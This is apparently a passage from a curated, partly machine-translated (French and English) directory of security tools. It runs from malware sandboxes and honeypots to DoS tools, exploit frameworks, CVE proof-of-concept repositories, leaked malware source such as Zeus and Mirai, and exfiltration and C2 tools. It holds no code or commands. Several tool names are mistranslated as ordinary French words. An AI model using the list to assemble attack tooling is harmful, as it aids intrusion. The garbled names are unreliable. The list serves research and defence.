  • DRAKVUF Sandbox - DRAKVUF Sandbox est un système automatisé d'analyse de malware de boîte noire avec moteur DRAKVUF sous le capot, qui ne nécessite pas d'agent sur le système d'exploitation invité.
  • DroidBox - Analyse dynamique des applications Android.
  • Hooker - Un projet open source pour des analyses dynamiques des applications Android.
  • Jsunpack-n - Émule la fonctionnalité du navigateur lors de la visite d'une URL.
  • LiSa - Sandbox pour l'analyse automatisée des logiciels malveillants Linux.
  • Magento-malware-scanner - Une collection de règles et d'échantillons pour détecter les logiciels malveillants Magento.
  • Malzilla - Les pages Web qui contiennent des exploits utilisent souvent une série de redirections et de code obscurci pour le rendre plus difficile à suivre pour quelqu'un. MalZilla est un programme utile à utiliser pour explorer les pages malveillantes. Il vous permet de choisir votre propre agent utilisateur et référent, et a la possibilité d'utiliser des proxys. Il vous montre la source complète des pages Web et tous les en-têtes HTTP. Il vous donne différents décodeurs pour essayer de désobfusquer également le javascript.
  • Panda - Plate-forme d'analyse dynamique neutre en architecture.
  • ProbeDroid - Un kit d'instrumentation binaire dynamique ciblant sur Android (Lollipop) 5.0 et supérieur.
  • PyEMU - Émulateur IA-32 entièrement scriptable, utile pour l'analyse de logiciels malveillants.
  • PyWinSandbox - bibliothèque Sandbox Windows Python. Créez une nouvelle machine Windows Sandbox, contrôlez-la avec une simple interface RPyC.
  • Pyrebox - Sandbox à ingénierie inverse scriptable Python, une infrastructure d' instrumentation et d'inspection de machine virtuelle basée sur QEMU.
  • Qiling - Framework d'émulation binaire avancé.
  • Uitkyk - Cadre d'analyse de la mémoire d'exécution pour identifier les logiciels malveillants Android.
  • Émulateur WScript - Émulateur / traceur de la fonctionnalité Windows Script Host.

Pot de miel

  • Amun - Amun a été le premier pot de miel à faible interaction basé sur python, suivant les concepts de Nepenthes mais en l'étendant avec une émulation plus sophistiquée et une maintenance plus facile.
  • Basic-auth-pot - HoneyPot d'authentification de base HTTP.
  • Bluepot - Pot de miel Bluetooth.
  • CitrixHoneypot - Détecte et enregistre les tentatives d'analyse et d'exploitation CVE-2019-19781.
  • Conpot - Pot de miel ICS / SCADA.
  • Cowrie - pot de miel SSH, basé sur Kippo.
  • Dionaea - Honeypot conçu pour piéger les logiciels malveillants.
  • Django-admin-honeypot - Un faux écran de connexion d'administrateur Django pour se connecter et informer les administrateurs d'une tentative d'accès non autorisé.
  • ESPot - Un pot de miel Elasticsearch écrit en NodeJS, pour capturer toutes les tentatives d'exploitation de CVE-2014-3120.
  • Elastichoney - Un pot de miel Elasticsearch simple.
  • Glastopf - Web Application Honeypot.
  • Glutton - Tous mangent du pot de miel.
  • HFish - Une plateforme multiplateforme de pots de miel développée sur la base de golang, qui a été méticuleusement conçue pour la sécurité de l'entreprise.
  • Annoncer - Parfois, vous voulez juste un pot de miel simple qui recueille les informations d'identification, rien de plus. L'annonce est ce pot de miel! Actuellement, les protocoles suivants sont pris en charge: ftp, telnet, ssh, rdp, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql et socks5.
  • HonTel - Un pot de miel pour le service Telnet. Fondamentalement, il s'agit d'une application Python v2.x émulant le service à l'intérieur de l'environnement chroot. À l'origine, il a été conçu pour être exécuté dans l'environnement Ubuntu / Debian, bien qu'il puisse être facilement adapté pour fonctionner dans n'importe quel environnement Linux.
  • HoneyPy - Un pot de miel à interaction faible à moyenne.
  • HoneyTrap - Cadre avancé de pot de miel .
  • Honeyd - Créez un honeynet virtuel.
  • Honeypot - Pot de miel à faible interaction qui affiche les attaques en temps réel.
  • Honeything - Un pot de miel pour l'Internet des objets TR-069. Il est conçu pour fonctionner complètement comme un modem / routeur doté d'un serveur Web intégré RomPager et prenant en charge le protocole TR-069 (CWMP).
  • HonnyPotter - A WordPress login honeypot for collection and analysis of failed login attempts.
  • Kippo - A medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.
  • Kippo-graph - Visualize statistics from a Kippo SSH honeypot.
  • MHN - Multi-snort and honeypot sensor management, uses a network of VMs, small footprint SNORT installations, stealthy dionaeas, and a centralized server for management.
  • MTPot - Open Source Telnet Honeypot.
  • Maildb - Python Web App to Parse and Track Email and http Pcap Files.
  • Mailoney - A SMTP Honeypot I wrote just to have fun learning Python.
  • Mnemosyne - Un normalisateur pour les données de pot de miel; soutient Dionaea.
  • MongoDB-HoneyProxy - Un proxy de pot de miel pour mongodb. Lorsqu'il est exécuté, cela procurera un proxy et enregistrera tout le trafic sur un serveur factice mongodb.
  • MysqlPot - Un pot de miel mysql, encore très très tôt.
  • NoSQLPot - Le framework NoSQL Honeypot.
  • Nodepot - Un pot de miel d'application web nodejs.
  • OWASP-Honeypot - Un logiciel open source en langage Python conçu pour créer un pot de miel et Honeynet de manière simple et sécurisée.
  • OpenCanary - Un démon qui exécute plusieurs versions canaries de services qui alerte lorsqu'un service est (ab) utilisé.
  • Phoneyc - Implémentation de Honeyclient Pure Python.
  • Phpmyadmin_honeypot - Un pot de miel phpMyAdmin simple et efficace.
  • Servletpot - Application Web Honeypot.
  • Shadow Daemon - Un pare-feu d'application Web modulaire / Pot de miel à haute interaction pour les applications PHP, Perl et Python.
  • Shiva - Spam Honeypot avec Intelligent Virtual Analyzer, est un Spam Honeypot (SpamPot) à relais ouvert mais contrôlé, construit au-dessus du cadre Lamson Python, avec la capacité de collecter et d'analyser tous les spams qui y sont lancés.
  • Smart-honeypot - Script PHP démontrant un pot de miel intelligent.
  • Caisse claire - HonEypot Super Reactive Advanced Next Generation
  • SpamScope - Outil d'analyse avancée et rapide du spam.
  • StrutsHoneypot - Pot de miel Struts basé sur Apache 2 ainsi qu'un module de détection pour les serveurs Apache 2.
  • T-Pot - La plate-forme tout en un Honeypot.
  • Tango - Honeypot Intelligence avec Splunk.
  • Thug - Honeyclient à faible interaction, pour enquêter sur les sites Web malveillants.
  • Twone-honeypots - pots de miel SSH, FTP et Telnet basés sur Twisted.
  • Zone humide - Pot de miel SSH à interaction élevée.
  • Wordpot - Un pot de miel WordPress.
  • Wp-smart-honeypot - Plugin WordPress pour réduire le spam de commentaires avec un pot de miel plus intelligent.

Intelligence

  • Modules MISP - Modules pour services d'extension, importation et exportation dans MISP.
  • Passivedns-client - Fournit une bibliothèque et un outil de requête pour interroger plusieurs fournisseurs DNS passifs.
  • Rt2jira - Convertissez les tickets RT en tickets JIRA.

Ops

  • Al-khaser - Techniques malveillantes publiques utilisées à l'état sauvage: machine virtuelle, émulation, débogueurs, détection de sandbox.
  • BASS - Synthétiseur de signature automatisé BASS.
  • CSCGuard - Protège et enregistre les utilisations suspectes et malveillantes de .NET CSC.exe et Runtime C # Compilation.
  • CapTipper - Un outil python pour analyser, explorer et relancer le trafic malveillant HTTP.
  • FLARE - Une distribution de sécurité entièrement personnalisable basée sur Windows pour l'analyse des logiciels malveillants, la réponse aux incidents, les tests de pénétration, etc.
  • FakeNet-NG - Un outil d'analyse de réseau dynamique de nouvelle génération pour les analystes de logiciels malveillants et les testeurs de pénétration. Il est open source et conçu pour les dernières versions de Windows.
  • Google-play-crawler - Google-play-crawler est simplement un outil Java pour rechercher des applications Android sur GooglePlay, et aussi les télécharger.
  • Googleplay-api - Une API Python non officielle qui vous permet de rechercher, parcourir et télécharger des applications Android à partir de Google Play (anciennement Android Market).
  • Grimd - Proxy DNS rapide qui peut s'exécuter n'importe où, conçu pour les publicités sur Internet et les serveurs malveillants.
  • Caché - Pilote Windows avec interface en mode utilisateur qui peut masquer des objets du système de fichiers et du registre, protéger les processus, etc.
  • ImaginaryC2 - Un outil python qui vise à aider dans l'analyse comportementale (réseau) des logiciels malveillants. Imaginary C2 héberge un serveur HTTP qui capture les requêtes HTTP vers des domaines / IP choisis de manière sélective. De plus, l'outil vise à faciliter la relecture des réponses de commande et de contrôle capturées / des charges utiles servies.
  • Irma - IRMA est un système d'analyse asynchrone et personnalisable pour les fichiers suspects.
  • KLara - Un projet vise à aider les chercheurs de Threat Intelligence à rechercher de nouveaux logiciels malveillants à l'aide de Yara.
  • Kraken - Scanner Yara multiplateforme écrit en Go.
  • Malbox - Construit l'analyse des logiciels malveillants des machines virtuelles Windows afin que vous n'ayez pas à le faire.
  • Mquery - Accélérateur de requêtes de logiciels malveillants YARA (interface Web).
  • Node-appland - Outil NodeJS pour télécharger des fichiers APK à partir d'appland.
  • Node-aptoide - NodeJS pour télécharger les fichiers APK d'aptoide.
  • Node-google-play - Appelez les API Google Play à partir de Node.
  • Pafish - Un outil de démonstration qui utilise plusieurs techniques pour détecter les bacs à sable et les environnements d'analyse de la même manière que les familles de logiciels malveillants.

Code source

  • Android-malware - Collection d'échantillons de malware Android.
  • BYOB - Un projet open source qui fournit un cadre permettant aux chercheurs et aux développeurs en sécurité de créer et d'exploiter un botnet de base pour approfondir leur compréhension des logiciels malveillants sophistiqués qui infectent des millions d'appareils chaque année et engendrent des botnets modernes, afin d'améliorer leur capacité à développer des contre-mesures contre ces menaces.
  • BlackHole - C # RAT (outil d'administration à distance).
  • Carberp - Carberp a divulgué du code source.
  • Fancybear - Code source de Fancy Bear.
  • LOLBAS - Living Off The Land Binaires et scripts - (LOLBins et LOLScripts).
  • Mirai - Code source Mirai divulgué à des fins de recherche / développement IoC.
  • Morris Worm - Le code source original de Morris Worm.
  • TinyNuke - Cheval de Troie bancaire de style Zeus.
  • Zerokit - Rootkit Zerokit / GAPZ (non constructible et uniquement pour la recherche).
  • Zeus - Zeus version 2.0.8.9, fuite en 2011.

Analyse statique

  • APKinspector - Un puissant outil GUI pour les analystes pour analyser les applications Android.
  • Androwarn - Détecte et avertit l'utilisateur des comportements malveillants potentiels développés par une application Android.
  • ApkAnalyser - Un outil d'analyse statique et virtuel pour examiner et valider le travail de développement de votre application Android.
  • Argus-SAF - Cadre d'analyse statique Argus.
  • CFGScanDroid - Numérisation de graphiques de flux de contrôle pour Android.
  • ConDroid - Exécution symbolique / concolique des applications Android.
  • DroidLegacy - Scripts d'analyse statique.
  • FSquaDRA - Détection rapide des applications Android reconditionnées basée sur la comparaison des fichiers de ressources inclus dans le package.
  • Floss - Solveur de cordes obscurcies FireEye Labs. Extrayez automatiquement les chaînes obscurcies des logiciels malveillants.
  • Inspeckage - Inspecteur de package Android - analyse dynamique avec des crochets API, démarrez des activités non exportées et plus encore.
  • Maldrolyzer - Cadre simple pour extraire des données "exploitables" à partir de logiciels malveillants Android (C&C, numéros de téléphone, etc.).
  • PEfile - Lisez et travaillez avec des fichiers exécutables portables (alias PE).
  • PEview - Un moyen rapide et facile de visualiser la structure et le contenu des fichiers exécutables portables (PE) 32 bits et COFF (Component Object File Format).
  • PScout - Analyse de la spécification d'autorisation Android.
  • Pdfminer - Un outil pour extraire des informations à partir de documents PDF.
  • Peepdf - Un outil Python pour explorer les fichiers PDF afin de savoir si le fichier peut être dangereux ou non. Le but de cet outil est de fournir tous les composants nécessaires dont un chercheur en sécurité pourrait avoir besoin dans une analyse PDF sans utiliser 3 ou 4 outils pour effectuer toutes les tâches.
  • Smali-CFGs - Smali Control Flow Graph's.
  • SmaliSCA - Smali Static Code Analysis.
  • Sysinternals Suite - Les utilitaires de dépannage de Sysinternals.
  • Yara - Identifiez et classifiez les échantillons de logiciels malveillants.

Réseau

Une analyse

  • Bro - Un cadre d'analyse de réseau puissant qui est très différent de l'IDS typique que vous connaissez peut-être.
  • Fatt - Un script basé sur pyshark pour extraire les métadonnées réseau et les empreintes digitales des fichiers pcap et du trafic réseau en direct.
  • Nidan - Un outil de surveillance de réseau actif.
  • Pytbull - Un framework de test IDS / IPS flexible basé sur python.
  • Sguil - Sguil (prononcé sgweel) est construit par des analystes de sécurité réseau pour des analystes de sécurité réseau. Le composant principal de Sguil est une interface graphique intuitive qui donne accès aux événements en temps réel, aux données de session et aux captures de paquets brutes.

Faux services

  • DNSChef - proxy DNS pour les testeurs de pénétration et les analystes de programmes malveillants.
  • DnsRedir - Un petit serveur DNS qui répondra à certaines requêtes avec des adresses fournies sur la ligne de commande.

Manipulation de paquets

  • Pig - Un outil de création de paquets Linux.
  • Yersinia - Un outil réseau conçu pour tirer parti d'une certaine faiblesse des différents protocoles réseau. Il prétend être un cadre solide pour analyser et tester les réseaux et systèmes déployés.

Renifleur

  • Cloud-pcap - Stockage et analyse Web PCAP.
  • Dnscap - Utilitaire de capture réseau conçu spécifiquement pour le trafic DNS.
  • Dsniff - Une collection d'outils pour l'audit de réseau et le pentesting.
  • Justniffer - Juste un renifleur de paquets TCP réseau. Justniffer est un analyseur de protocole réseau qui capture le trafic réseau et produit des journaux de manière personnalisée, peut émuler les fichiers journaux du serveur Web Apache, suivre les temps de réponse et extraire tous les fichiers "interceptés" du trafic HTTP.
  • Moloch - Moloch est un système open source de capture, d'indexation et de base de données PCAP à grande échelle.
  • Net-creds - Renifle les données sensibles de l'interface ou du pcap.
  • Netsniff-ng - Un couteau suisse pour la plomberie de votre réseau Linux quotidien.
  • NetworkMiner - Un outil d'analyse médico-légale du réseau (NFAT).
  • OpenFPC - OpenFPC est un ensemble de scripts qui se combinent pour fournir un enregistreur de trafic réseau léger complet et un outil de mise en mémoire tampon. Son objectif de conception est de permettre aux utilisateurs non experts de déployer un enregistreur de trafic réseau distribué sur le matériel COTS tout en s'intégrant aux outils d'alerte et de journalisation existants.
  • Openli - Logiciel d'interception légale conforme à la norme Open Source ETSI.
  • PF_RING - PF_RING ™ est un module de noyau Linux et une infrastructure d'espace utilisateur qui vous permet de traiter des paquets à des taux élevés tout en vous fournissant une API cohérente pour les applications de traitement de paquets.
  • Termshark - Une interface utilisateur de terminal pour tshark, inspirée de Wireshark.
  • WebPcap - Un analyseur de paquets basé sur le Web (architecture client / serveur). Utile pour analyser des applications distribuées ou des périphériques intégrés.
  • Wireshark - Un analyseur de paquets gratuit et open-source.

Tests de pénétration

DoS

  • DHCPig - Script d' épuisement DHCP écrit en python à l'aide de la bibliothèque réseau scapy.
  • LOIC - Low Orbit Ion Cannon - Un outil de stress de réseau open source, écrit en C #. Basé sur le projet LOIC de Praetox.
  • Memcrashed - Outil d'attaque DDoS pour envoyer des paquets UDP falsifiés à des serveurs Memcached vulnérables obtenus à l'aide de l'API Shodan.
  • Sockstress - Implémentation de Sockstress (TCP DoS).
  • T50 - L'outil de stress réseau le plus rapide.
  • Torshammer - le marteau de Tor. Outil DDOS post lent écrit en python.
  • UFONet - Abuse OSI Layer 7-HTTP pour créer / gérer des «zombies» et pour mener différentes attaques en utilisant; GET / POST, multithreading, procurations, méthodes d'usurpation d'origine, techniques d'évasion de cache, etc.

Exploitant

  • AttackSurfaceAnalyzer - Attack Surface Analyzer peut vous aider à analyser la configuration de sécurité de votre système d'exploitation pour les changements lors de l'installation du logiciel.
  • Bashfuscator - Un cadre d'obfuscation Bash entièrement configurable et extensible. Cet outil est destiné à aider à la fois l'équipe rouge et l'équipe bleue.
  • BeEF - Le projet de cadre d'exploitation du navigateur.
  • BugId - Détecte, analyse et identifie de manière unique les plantages dans les applications Windows.
  • Commix - Outil automatisé d'injection et d'exploitation de commandes OS tout-en-un.
  • DLLInjector - Injecte des DLL dans les processus.
  • Donut - Génère un code shell indépendant de la position x86, x64 ou AMD64 + x86 qui charge les assemblages .NET, les fichiers PE et d'autres charges utiles Windows à partir de la mémoire et les exécute avec des paramètres.
  • Drupwn - Outil de dénombrement et d'exploitation Drupal.
  • EfiGuard - Désactivez PatchGuard et DSE au démarrage.
  • Evilgrade - Le cadre d'explotation de mise à jour.
  • Exe2hex - Transfert de fichiers en ligne à l'aide d'outils Windows intégrés (DEBUG.exe ou PowerShell).
  • Fathomless - Une collection de différents programmes pour le regroupement en réseau rouge.
  • Gorsair - Gorsair se fraye un chemin dans des conteneurs Docker distants qui exposent leurs API.
  • LAVA - Ajout de vulnérabilité automatisé à grande échelle.
  • Linux Exploit Suggester - Linux Exploit Suggester; basé sur le numéro de version du système d'exploitation.
  • Linux-exploit-suggester - Outil d'audit d'élévation de privilèges Linux.
  • Macrome - Lecteur / rédacteur de documents de macros Excel pour les équipes et analystes rouges
  • Cadre Metasploit - Cadre d' exploitation.
  • MeterSSH - Une façon de prendre le shellcode, de l'injecter dans la mémoire puis de tunneler le port que vous voulez sur SSH pour masquer tout type de communication comme une connexion SSH normale. La façon dont cela fonctionne consiste à injecter le shellcode dans la mémoire, puis à envelopper un port généré (mètre mètre dans ce cas) par le shellcode sur SSH vers la machine des attaquants. Ensuite, la connexion avec l'écouteur de meterpreter à localhost communiquera via le proxy SSH, à la victime via le tunnel SSH. Toutes les communications sont relayées via le tunnel SSH et non via le réseau.
  • Nessus - Évaluation de la vulnérabilité, de la configuration et de la conformité.
  • Nexpose - Logiciel de gestion des vulnérabilités et de gestion des risques.
  • OpenVAS - Scanner et gestionnaire de vulnérabilités Open Source.
  • PSKernel-Primitives - Exploit primitives for PowerShell.
  • PowerSploit - A PowerShell Post-Exploitation Framework.
  • ROP Gadget - Framework for ROP exploitation.
  • Routersploit - Automated penetration testing software for router.
  • Rupture - A framework for BREACH and other compression-based crypto attacks.
  • SPARTA - Network Infrastructure Penetration Testing Tool.
  • SharpShooter - Payload Generation Framework.
  • ShellcodeCompiler - A program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows (x86 and x64) and Linux (x86 and x64). It is possible to call any Windows API function or Linux syscall in a user-friendly way.
  • Shellen - Interactive shellcoding environment to easily craft shellcodes.
  • Shellsploit - Let's you generate customized shellcodes, backdoors, injectors for various operating system. And let's you obfuscation every byte via encoders.
  • Spoodle - A mass subdomain + poodle vulnerability scanner.
  • SysWhispers - AV/EDR evasion via direct system calls.
  • Unicorn - Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
  • Veil Framework - A tool designed to generate metasploit payloads that bypass common anti-virus solutions.
  • Vuls - Vulnerability scanner for Linux/FreeBSD, agentless, written in Go.
  • Windows Exploit Suggester - Detects potential missing patches on the target.
  • Ysoserial.net - Deserialization payload generator for a variety of .NET formatters.
  • Zarp - Network Attack Tool.

Exploits

  • Apache-uaf - Apache use after free bug infos / ASAN stack traces.
  • BlueGate - PoC (DoS + scanner) for CVE-2020-0609 & CVE-2020-0610 - RD Gateway RCE.
  • Bluedroid - PoCs of Vulnerabilities on Bluedroid.
  • Broadpwn - Broadpwn bug (CVE-2017-9417).
  • CVE-2018-8120 - CVE-2018-8120.
  • CVE-2018-8897 - Implements the POP/MOV SS (CVE-2018-8897) vulnerability by bugchecking the machine (local DoS).
  • CVE-2019-0604 - cve-2019-0604 SharePoint RCE exploit.
  • CVE-2019-18935 - RCE exploit for a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.
  • CVE-2019-6453 - Proof of calc for CVE-2019-6453 (Mirc exploit).
  • CVE-2020-10560 - OSSN Arbitrary File Read
  • CVE-2020-11651 - PoC for CVE-2020-11651.
  • Chakra-2016-11 - Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201).
  • Desharialize - Easy mode to Exploit CVE-2019-0604 (Sharepoint XML Deserialization Unauthenticated RCE).
  • ES File Explorer Open Port Vulnerability - ES File Explorer Open Port Vulnerability - CVE-2019-6447.
  • HolicPOC - CVE-2015-2546, CVE-2016-0165, CVE-2016-0167, CVE-2017-0101, CVE-2017-0263, CVE-2018-8120.
  • Jira-Scan - Jira scanner for CVE-2017-9506.
  • Kernel Exploits - Various kernel exploits.
  • MS17-010 - Exploits for MS17-010.
  • Qemu-vm-escape - This is an exploit for CVE-2019-6778, a heap buffer overflow in slirp:tcp_emu().
  • Ruby-advisory-db - A database of vulnerable Ruby Gems.
  • The Exploit Database - The official Exploit Database repository.
  • XiphosResearch Exploits - Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
  • cve-2020-1054 - LPE for CVE-2020-1054 targeting Windows 7 x64

Fuzzing

  • AFL++ - AFL 2.56b with community patches, AFLfast power schedules, qemu 3.1 upgrade + laf-intel support, MOpt mutators, InsTrim instrumentation, unicorn_mode, Redqueen and a lot more.
  • AndroFuzz - A fuzzing utility for Android that focuses on reporting and delivery portions of the fuzzing process.
  • Construct - Declarative data structures for python that allow symmetric parsing and building.
  • Deepstate - A unit test-like interface for fuzzing and symbolic execution.
  • Driller - Augmenting AFL with symbolic execution.
  • Eclipser - Grey-box Concolic Testing on Binary Code.
  • Frankenstein - Broadcom and Cypress firmware emulation for fuzzing and further full-stack debugging.
  • Fusil - A Python library used to write fuzzing programs. It helps to start process with a prepared environment (limit memory, environment variables, redirect stdout, etc.), start network client or server, and create mangled files.
  • Fuzzbox - A multi-codec media fuzzing tool.
  • Fuzzlyn - Fuzzer for the .NET toolchains, utilizes Roslyn to generate random C# programs.
  • Honggfuzz - Security oriented fuzzer with powerful analysis options. Supports evolutionary, feedback-driven fuzzing based on code coverage (sw and hw).
  • InsTrim - Lightweight Instrumentation for Coverage-guided Fuzzing.
  • KleeFL - Seeding Fuzzers With Symbolic Execution.
  • MFFA - Media Fuzzing Framework for Android.
  • Melkor-android - An Android port of the melkor ELF fuzzer.
  • Netzob - Netzob is an opensource tool for reverse engineering, traffic generation and fuzzing of communication protocols.
  • Neuzz - A neural-network-assisted fuzzer.
  • Python-AFL - American fuzzy lop fork server and instrumentation for pure-Python code.
  • RPCForge - Windows RPC Python fuzzer.
  • Radamsa-android - An Android port of radamsa fuzzer.
  • Razzer - A Kernel fuzzer focusing on race bugs.
  • Retrowrite - Retrofitting compiler passes though binary rewriting.
  • SecLists - A collection of multiple types of lists used during security assessments.
  • Sienna-locomotive - A user-friendly fuzzing and crash triage tool for Windows.
  • Sulley - Fuzzer development and fuzz testing framework consisting of multiple extensible components.
  • T-Fuzz - A fuzzing tool based on program transformation.
  • TAOF - The Art of Fuzzing, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer.
  • Unicorefuzz - Fuzzing the Kernel Using Unicornafl and AFL++.
  • Unicornafl - Unicorn CPU emulator framework (ARM, AArch64, M68K, Mips, Sparc, X86) adapted to afl++.
  • VUzzer - This Project depends heavily on a modeified version of DataTracker, which in turn depends on LibDFT pintool. It has some extra tags added in libdft.
  • Vfuzz - I don't claim superiority over other engines in performance or efficiency out of the box, but this does implement some features that I felt where lacking elsewhere.
  • Winafl - A fork of AFL for fuzzing Windows binaries.
  • Windows IPC Fuzzing Tools - A collection of tools used to attack applications that use Windows Interprocess Communication mechanisms.
  • Zulu - A fuzzer designed for rapid prototyping that normally happens on a client engagement where something needs to be fuzzed within tight timescales.

Info Gathering

  • ATSCAN - Advanced dork Search & Mass Exploit Scanner.
  • Bundler-audit - Patch-level verification for Bundler.
  • Commando-vm - Complete Mandiant Offensive VM (Commando VM), the first full Windows-based penetration testing virtual machine distribution. The security community recognizes Kali Linux as the go-to penetration testing platform for those that prefer Linux. Commando VM is for penetration testers that prefer Windows.
  • Dnsenum - A perl script that enumerates DNS information.
  • Dnsmap - Passive DNS network mapper.
  • Dnsrecon - DNS Enumeration Script.
  • EgressCheck Framework - Used to check for TCP and UDP egress filtering on both windows and unix client systems.
  • Egressbuster - A method to check egress filtering and identify if ports are allowed. If they are, you can automatically spawn a shell.
  • EyeWitness - EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
  • IVRE - An open-source framework for network recon. It relies on open-source well-known tools to gather data (network intelligence), stores it in a database, and provides tools to analyze it.
  • Knock - A python tool designed to enumerate subdomains on a target domain through a wordlist.
  • Operative-framework - This is a framework based on fingerprint action, this tool is used for get information on a website or a enterprise target with multiple modules (Viadeo search,Linkedin search, Reverse email whois, Reverse ip whois, SQL file forensics ...).
  • Recon-ng - A full-featured Web Reconnaissance framework written in Python.
  • SMBMap - A handy SMB enumeration tool.
  • SPartan - Frontpage and Sharepoint fingerprinting and attack tool.
  • SSLMap - TLS/SSL cipher suite scanner.
  • Secretz - A tool that minimizes the large attack surface of Travis CI. It automatically fetches repos, builds, and logs for any given organization.
  • Sparty - MS Sharepoint and Frontpage Auditing Tool.
  • Spyse.py - Python API wrapper and command-line client for the tools hosted on spyse.com.
  • SubFinder - A subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
  • SubQuest - Fast, Elegant subdomain scanner using nodejs.
  • Subbrute - A DNS meta-query spider that enumerates DNS records, and subdomains.
  • TravisLeaks - A tool to find sensitive keys and passwords in Travis logs.
  • TruffleHog - Searches through git repositories for high entropy strings, digging deep into commit history.
  • URLextractor - Information gathering & website reconnaissance.
  • VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
  • Wmap - Information gathering for web hacking.
  • XRay - A tool for recon, mapping and OSINT gathering from public networks.

MITM

  • Bettercap - A powerful, flexible and portable tool created to perform various types of MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in realtime, sniff for credentials and much more.
  • Caplets - Bettercap scripts (caplets) and proxy modules.
  • Dnsspoof - DNS spoofer. Drops DNS responses from the router and replaces it with the spoofed DNS response.
  • Ettercap - A comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
  • MITMf - Framework for Man-In-The-Middle attacks.
  • Mallory - An extensible TCP/UDP man in the middle proxy that is designed to be run as a gateway. Unlike other tools of its kind, Mallory supports modifying non-standard protocols on the fly.
  • Mitmproxy - An interactive, SSL-capable man-in-the-middle proxy for HTTP with a console interface.
  • Mitmsocks4j - Man in the Middle SOCKS Proxy for JAVA.
  • Nogotofail - An on-path blackbox network traffic security testing tool.
  • Responder - A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
  • Ssh-mitm - An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.

Mobile

  • AFE - Android Framework for Exploitation, is a framework for exploiting android based devices.
  • AndroBugs - An efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications.
  • Android-vts - Android Vulnerability Test Suite - In the spirit of open data collection, and with the help of the community, let's take a pulse on the state of Android security.
  • Androl4b - A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis.
  • CobraDroid - A custom build of the Android operating system geared specifically for application security analysts and for individuals dealing with mobile malware.
  • Drozer - The Leading Security Assessment Framework for Android.
  • Idb - A tool to simplify some common tasks for iOS pentesting and research.
  • Introspy-iOS - Security profiling for blackbox iOS.
  • JAADAS - Joint Advanced Defect assEsment for android applications.
  • Keychain-Dumper - A tool to check which keychain items are available to an attacker once an iOS device has been jailbroken.
  • Mobile Security Framework - An intelligent, all-in-one open source mobile application (Android/iOS/Windows) automated pen-testing framework capable of performing static, dynamic analysis and web API testing.
  • Objection - A runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.
  • QARK - QARK by LinkedIn is for app developers to scan app for security issues.

Password Cracking

  • BozoCrack - A silly & effective MD5 cracker in Ruby.
  • Common-substr - Simple awk script to extract the most common substrings from an input text. Built for password cracking.
  • HashCat - World's fastest and most advanced password recovery utility.
  • Hashcrack - Guesses hash types, picks some sensible dictionaries and rules for hashcat.
  • Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.
  • John the Ripper - A fast password cracker.
  • NPK - A mostly-serverless distributed hash cracking platform.
  • Patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
  • THC-Hydra - A very fast network logon cracker which support many different services.

Port Scanning

  • Angry IP Scanner - Fast and friendly network scanner.
  • Evilscan - NodeJS Simple Network Scanner.
  • Flan - A pretty sweet vulnerability scanner.
  • Masscan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
  • Nmap - Free Security Scanner For Network Exploration & Security Audits.
  • Watchdog - A Comprehensive Security Scanning and a Vulnerability Management Tool.
  • ZGrab - Go Application Layer Scanner.
  • Zmap - An open-source network scanner that enables researchers to easily perform Internet-wide network studies.

Post Exploitation

  • Apfell - A collaborative, multi-platform, red teaming framework.
  • Backdoorme - Powerful auto-backdooring utility.
  • CatTails - Raw socket library/framework for red team events.
  • Cloudy-kraken - AWS Red Team Orchestration Framework.
  • Covenant - Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
  • CrackMapExec - A post-exploitation tool that helps automate assessing the security of large Active Directory networks.
  • CredCrack - A fast and stealthy credential harvester.
  • Creddump - Dump windows credentials.
  • DBC2 - DropboxC2 is a modular post-exploitation tool, composed of an agent running on the victim's machine, a controler, running on any machine, powershell modules, and Dropbox servers as a means of communication.
  • DET - (extensible) Data Exfiltration Toolkit (DET).
  • DNSlivery - Easy files and payloads delivery over DNS.
  • Dnsteal - DNS Exfiltration tool for stealthily sending files over DNS requests.
  • Empire - Empire is a pure PowerShell post-exploitation agent.
  • Enumdb - MySQL and MSSQL brute force and post exploitation tool to search through databases and extract sensitive information.
  • EvilOSX - A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.
  • Fireaway - Next Generation Firewall Audit and Bypass Tool.
  • FruityC2 - A post-exploitation (and open source) framework based on the deployment of agents on compromised machines. Agents are managed from a web interface under the control of an operator.
  • GetVulnerableGPO - PowerShell script to find 'vulnerable' security-related GPOs that should be hardended.
  • Ghost In The Logs - Evade sysmon and windows event logging.
  • HoneyBadger - A collection of Metasploit modules with a plugin to help automate Post-Exploitation actions on target systems using the Metasploit Framework.
  • HoneypotBuster - Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host.
  • Iodine - Lets you tunnel IPv4 data through a DNS server.
